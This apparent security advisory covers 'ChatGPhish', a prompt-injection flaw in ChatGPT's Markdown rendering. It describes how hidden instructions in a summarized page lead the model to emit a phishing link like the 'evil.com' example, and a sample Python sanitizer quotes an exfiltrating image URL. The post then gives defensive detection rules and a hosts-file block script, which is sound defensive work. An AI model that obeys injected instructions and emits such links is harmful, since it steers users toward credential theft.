Security researchers at Permiso Security have disclosed a critical vulnerability affecting OpenAI's ChatGPT platform, codenamed ChatGPhish. This finding exposes a fundamental flaw in how the chatgpt.com response renderer handles Markdown content. By leveraging implicit trust in Markdown links and images, attackers can execute prompt injections that turn the AI's output into a potent social engineering surface.
For defenders, this represents a significant shift in the threat landscape. The attack vector bypasses traditional email phishing filters because the malicious payload is generated dynamically by a trusted source—the AI model itself. Users are conditioned to trust the AI's summaries, making them highly likely to interact with attacker-provided links or download malicious files. We must treat AI output as an untrusted input channel until vendor patches are applied.
Technical Analysis
Affected Products:
- Platform: OpenAI ChatGPT (Web Interface)
- Domain: chatgpt.com
- Component: Client-side Markdown response renderer
Vulnerability Mechanics: The ChatGPhish vulnerability stems from the renderer's failure to sanitize or visually distinguish user-controlled Markdown content from the model's internal reasoning. The attack chain is as follows:
- Prompt Injection: An attacker crafts a malicious input hidden within a webpage or document that ChatGPT is asked to summarize.
- AI Processing: The LLM processes the input but fails to isolate the malicious instruction from the data due to the lack of strict output sanitization.
- Trusted Rendering: The AI responds with Markdown containing a malicious link (e.g., [Login Here](http://evil.com)). The chatgpt.com interface renders this link without a security warning or distinct visual cue indicating it is an external, unverified reference.
- Exploitation: The user, trusting the AI's summary, clicks the link, leading to credential harvesting or malware delivery.
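The mitigation the attack chain above points at is a renderer that refuses to treat Markdown links and images in model output as trusted. The following is an added example (not Permiso's or OpenAI's code) of that output-side control in Python: it rewrites external links so the real destination is shown beside the label, withholds images from external origins (they fetch silently on render), and drops non-http(s) schemes. The TRUSTED_HOSTS allowlist and the sample response text are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Assumption: origins the renderer treats as first-party; everything else is "external".
TRUSTED_HOSTS = {"chatgpt.com", "openai.com"}

# Matches Markdown images ![alt](url) and links [text](url); group 1 is the optional "!".
MD_LINK_RE = re.compile(r'(!?)\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')


def classify_url(url):
    """Return 'trusted', 'external' or 'blocked' for a Markdown link target."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if parsed.scheme.lower() not in ("http", "https"):
        return "blocked"          # file:, data:, javascript: and friends never render as links
    if host in TRUSTED_HOSTS or any(host.endswith("." + h) for h in TRUSTED_HOSTS):
        return "trusted"
    return "external"


def harden_markdown(text):
    """Rewrite model output so every external reference is visibly marked.

    Returns (hardened_text, findings) where findings is a list of (verdict, url).
    """
    findings = []

    def rewrite(match):
        is_image, label, url = match.group(1) == "!", match.group(2), match.group(3)
        verdict = classify_url(url)
        findings.append((verdict, url))
        if verdict == "blocked":
            return f"[{label}] (link removed: unsupported URL scheme)"
        if verdict == "trusted":
            return match.group(0)  # first-party reference, rendered unchanged
        if is_image:
            # An external image loads on render without a click; show the URL as text instead.
            return f"[image withheld: {url}]"
        # External link: keep it clickable but print the true host so label text cannot mask it.
        return f"{match.group(0)} (external link: {urlparse(url).hostname})"

    return MD_LINK_RE.sub(rewrite, text), findings


if __name__ == "__main__":
    # Constructed sample of a model "summary" carrying injected Markdown.
    sample = ("Summary: [Login Here](http://evil.example) and see "
              "![logo](https://evil.example/t.png?d=secret) or [FAQ](https://chatgpt.com/faq)")
    hardened, found = harden_markdown(sample)
    print(hardened)
    print(found)
```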
CVE Status: As of Permiso Security's initial disclosure, no CVE identifier has been published; the issue is tracked under the name ChatGPhish. Given the high impact on integrity and user trust, this vulnerability warrants the same immediate attention as a high-severity CVSS finding (likely 7.0+).
Exploitation Status:
- Theoretical to PoC: The technique has been demonstrated by researchers. While no widespread active exploitation campaign has been confirmed in the wild yet, the barrier to entry for attackers is low, requiring no exploits beyond crafting specific prompt text.
Detection & Response
Detecting this vulnerability is challenging because it occurs within the browser's rendering of a trusted SaaS application. Standard EDRs do not inspect Markdown rendering logic. Therefore, detection relies on identifying the usage of the platform in high-risk contexts and monitoring the network interactions that may result from successful social engineering.
SIGMA Rules
---
title: ChatGPhish - Network Traffic to OpenAI ChatGPT
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
status: experimental
description: Detects outbound connections to chatgpt.com. High volumes or unexpected usage may indicate exposure to ChatGPhish prompt injection vectors during active exploitation phases.
references:
    - https://permiso.io/blog/chatgphish-vulnerability
author: Security Arsenal
date: 2026/05/15
tags:
    - attack.initial_access
    - attack.t1566
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationHostname|contains: 'chatgpt.com'
    condition: selection
falsepositives:
    - Legitimate business use of ChatGPT
level: low
---
title: ChatGPhish - Suspicious Browser Process Spawning
id: 2b3c4d5e-6f7a-8b9c-0d1e-2f3a4b5c6d7e
status: experimental
description: Detects browser processes spawning command-line utilities (like PowerShell or Curl) shortly after network activity to AI platforms, potentially indicating a successful social engineering click leading to script execution.
references:
    - https://permiso.io/blog/chatgphish-vulnerability
author: Security Arsenal
date: 2026/05/15
tags:
    - attack.execution
    - attack.t1204
logsource:
    category: process_creation
    product: windows
detection:
    selection_browser:
        ParentImage|endswith:
            - '\chrome.exe'
            - '\msedge.exe'
            - '\firefox.exe'
    selection_cli:
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
            - '\curl.exe'
    filter_legit:
        CommandLine|contains: 'update' # Common noise
    condition: selection_browser and selection_cli and not filter_legit
falsepositives:
    - Legitimate administrative downloads triggered by user
level: high
KQL (Microsoft Sentinel / Defender)
This query hunts for traffic to chatgpt.com and correlates it with immediate connections to potentially suspicious external domains, a pattern indicative of a user clicking a link provided by the AI.
let OpenAIDomains = dynamic(['chatgpt.com', 'openai.com']);
let TimeFrame = 1h;
// Proxy/firewall records of the user reaching the AI platform.
let ChatGPTTraffic = CommonSecurityLog
| where TimeGenerated > ago(TimeFrame)
| where RequestURL has_any (OpenAIDomains) or DestinationHostName has_any (OpenAIDomains)
| project ChatTime=TimeGenerated, SourceIP, ChatURL=RequestURL, DeviceName;
// Endpoint network events to anything that is not the AI platform or common first-party noise.
let SuspiciousOutbound = DeviceNetworkEvents
| where TimeGenerated > ago(TimeFrame)
| where isnotempty(RemoteUrl)
| where not(RemoteUrl has_any (OpenAIDomains)) and RemoteUrl !contains "microsoft.com" and RemoteUrl !contains "google.com" // Filter common safe destinations
| project LinkTime=TimeGenerated, SourceIP=LocalIP, SuspiciousLink=RemoteUrl, Process=InitiatingProcessFileName;
ChatGPTTraffic
| join kind=inner SuspiciousOutbound on SourceIP
| where LinkTime between (ChatTime .. (ChatTime + 5m)) // Click within 5 mins of viewing summary
| project ChatTime, LinkTime, SourceIP, DeviceName, ChatURL, SuspiciousLink, Process
Velociraptor VQL
This Velociraptor artifact hunts for evidence of DNS queries to OpenAI platforms on the endpoint, identifying machines actively using the service that may be susceptible to the ChatGPhish vector.
-- Hunt for DNS cache entries related to ChatGPT to identify exposed endpoints.
-- =~ is a regex match in VQL, so the dot is bracketed and the pattern anchored
-- to avoid matching unrelated names such as chatgptxcom.example.
SELECT
    Timestamp,
    Name AS Domain,
    Type AS RecordType,
    Data AS IP_Address
FROM dns_cache()
WHERE Name =~ '(^|[.])(chatgpt|openai)[.]com$'
ORDER BY Timestamp DESC
Remediation Script (PowerShell)
Since the vulnerability is in the web rendering logic, endpoint patching is not applicable until OpenAI releases a fix. The most effective immediate technical control is restricting access via the HOSTS file or proxy for non-essential users. The following script adds a temporary block to the HOSTS file for high-security environments.
<#
.SYNOPSIS
    Hardens endpoint against ChatGPhish by blocking chatgpt.com via HOSTS file.
.DESCRIPTION
    Use only in environments where ChatGPT usage is non-essential or until the vendor
    patches the Markdown rendering vulnerability. Requires Administrator privileges.
#>
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
$DomainToBlock = "chatgpt.com"
$RedirectIP = "127.0.0.1"

# Abort unless running elevated: the hosts file is writable only by Administrators.
$Principal = [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()
if (-not $Principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    Write-Error "This script must be run as Administrator."
    exit 1
}

$HostsContent = Get-Content -Path $HostsPath -ErrorAction SilentlyContinue
# Match only an active (uncommented) entry for exactly this domain; the dot is escaped so it is not a regex wildcard.
$EntryPattern = "^\s*\S+\s+$([regex]::Escape($DomainToBlock))(\s|$)"
if ($HostsContent -match $EntryPattern) {
    Write-Host "[INFO] $DomainToBlock is already present in the hosts file." -ForegroundColor Yellow
} else {
    try {
        # If the file does not end with a newline, start a fresh line so the entry does not fuse with the last one.
        $Raw = Get-Content -Path $HostsPath -Raw -ErrorAction SilentlyContinue
        if ($Raw -and -not $Raw.EndsWith("`n")) {
            Add-Content -Path $HostsPath -Value "" -Encoding Ascii
        }
        Add-Content -Path $HostsPath -Value "$RedirectIP`t$DomainToBlock" -Encoding Ascii
        Write-Host "[SUCCESS] Added block for $DomainToBlock to hosts file." -ForegroundColor Green
        # Flush DNS resolver cache to apply immediately
        Clear-DnsClientCache
        Write-Host "[SUCCESS] DNS cache flushed." -ForegroundColor Green
    }
    catch {
        Write-Error "[ERROR] Failed to modify hosts file: $_"
    }
}
Remediation
- Vendor Coordination: Monitor official OpenAI security advisories for a patch addressing the Markdown renderer sanitization. The fix will likely involve distinct visual tagging of external links or stripping active content from untrusted sources.
- Network Controls (Immediate): If your organization allows access to Generative AI tools, implement a Secure Web Gateway (SWG) rule to inspect or block traffic to chatgpt.com until the patch is verified. The PowerShell script above provides a host-based fallback for critical assets.
- User Awareness: Immediately notify security teams and staff. The core risk is trust in the "Summary." Users must be trained to treat links generated by ChatGPT with the same suspicion as links in unsolicited emails.
- Data Loss Prevention (DLP): Ensure DLP rules are triggered on data exfiltration to unknown domains, even if the traffic originates from a browser session with chatgpt.com.